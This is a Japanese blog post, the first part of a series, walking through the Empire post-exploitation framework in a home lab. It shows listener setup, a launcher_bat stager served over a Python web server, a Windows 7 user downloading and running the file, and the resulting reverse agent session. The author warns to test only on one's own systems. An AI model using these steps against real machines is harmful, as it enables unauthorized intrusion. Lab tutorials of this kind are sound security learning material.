とある親父の侵入実験【Empire:帝国の力 前編】

f:id:appleseedj073:20170503114540p:plain

はい、久しぶりにペネトレします。散々紹介してきたEmpireってツールを使って対象端末のパスワードを調べてみようかと思います。

 

ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。

 

準備したもの

  • MacBook Pro
  • ダークサイドに堕ちたフォース

 

環境(仮想環境)

  1. Kali Linux(192.168.1.100)
  2. Windows 7 SP1(192.168.1.10)

 

1 待受準備

まずは、Kali側でEmpireを起動しリスナーモードを立ち上げる。

f:id:appleseedj073:20170503115145p:plain

 (Empire) > listeners

 (Empire: listeners) >

 

 (Empire: listeners) > info

f:id:appleseedj073:20170503115447p:plain

infoコマンドで見るとこんな感じ。今回は何も変更せずにこのまま「test」って名前のリスナーを作る。

 

f:id:appleseedj073:20170503115708p:plain

このまま実行

 (Empire: listeners) > execute

「list」で確認すると上図のようになってる。これで待ち受け完了。

 

2 侵入準備

次にこのリスナーに接続に来るファイルを作成する。macroにしたりexeにしたりと色々できるけど今回はお手軽なbatファイルを作成する。

 (Empire: listeners) > usestager launcher_bat (リスナーの名前:今回はtest)
 (Empire: stager/launcher_bat) > info

f:id:appleseedj073:20170503120256p:plain

とりあえずこんな感じになります。これもこのままのデフォルト設定で作成します。

 (Empire: stager/launcher_bat) > execute

 

f:id:appleseedj073:20170503120446p:plain

/tmp配下に作成された様子。

f:id:appleseedj073:20170503120608p:plain

 

とりあえず今回は、こいつをWebサーバを立ち上げてデリバリーする。

 python -m SimpleHTTPServer 80

f:id:appleseedj073:20170503120857p:plain

 

3 配達・実行

今度はWindows側でブラウザを立ち上げて先ほど立ち上げたWebサーバにアクセスする。

f:id:appleseedj073:20170503121211p:plain

真ん中あたりに作成したbatがあるので、これをダウンロードして実行

 

f:id:appleseedj073:20170503121322p:plain

とりあえず「実行」する。

 

4 侵入完了

Kali側に戻って確認するとリバース接続があるのが確認できる。

f:id:appleseedj073:20170503121616p:plain

 (Empire: stager/launcher_bat) > agents

 

エージェントモードに切り替えることで、端末から接続があるのが確認できる。次にこの端末にインタラクトする。

 (Empire: agents) > interact (セッションID:TPESSRK3BLUPTA4G)

 (Empire: TPESSRK3BLUPTA4G) > info

f:id:appleseedj073:20170503122017p:plain

無事に侵入できたところで一旦終了w